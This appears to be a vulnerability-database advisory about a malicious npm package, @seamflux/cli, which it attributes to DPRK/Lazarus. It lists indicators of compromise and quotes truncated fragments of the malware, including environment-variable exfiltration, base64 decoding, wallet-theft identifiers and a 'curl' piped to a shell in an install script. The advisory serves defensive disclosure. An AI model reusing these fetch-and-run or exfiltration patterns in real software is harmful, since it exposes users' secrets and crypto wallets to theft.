VDB
GCVE-110-OSM-2026-1521
GCVE-110-OSM-2026-1521
Advisory PublishedCVSS 9.6/10
APT malware detected: chai-max. Associated with threat actor(s): DPRK/Lazarus. Behaviors: data exfiltration, network activity, obfuscated code, install-time execution.
Payload: dist/index.js
Key findings:
- Environment Variable Exfiltration in dist/index.js: "process.env.no_proxy;
if (!raw)
return false;
for (const part of raw.spl..."
- Escaped Protocol Pattern in dist/index.js: ""://""
- Chai-Max Wallet Theft Indicators in dist/index.js: "SOLANA_METHODS, SOLANA_EVENTS, DEFAULT_STORAGE_PATH, SEAMFLUX_WC_STORAGE_PATH_EN..."
- Download and Execute in scripts/install-bun.js: "curl + bash
return {
cmd: "sh",
args: ["-c", "curl -fsSL https:/..."
- Dynamic Base64 Decoding in dist/index.js: "Buffer.from(encryptedData, "base64")"
IOCs:
- urls: https://sui-rpc.publicnode.com`;, https://app.seamflux.ai, https://seamflux.ai, https://walletconnect.network, https://app.seamflux.ai/connections. (+13 more)
- domains: sui-rpc.publicnode.com, walletconnect.network, out.to, cfg.id, archive.prod.nado.xyz (+9 more)
- ethereumAddresses: 0x05ec92d78ed421f3d3ada77ffde167106565974e, 0xaacFeEa03eb1561C4e67d661e40682Bd20E3541b, 0x0000000000000000000000000000000000000000, 0x1924b8561eeF20e70Ede628A296175D358BE80e5
- payloadFileHash: 995f00412717556afbe2f694aa8af8f6642c4234e6b25dbd4354712b65d5f5df
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | @seamflux/cli | all (affected) | — |
Browse GCVE Records
73,044 records in the GCVE database · Updated July 16, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.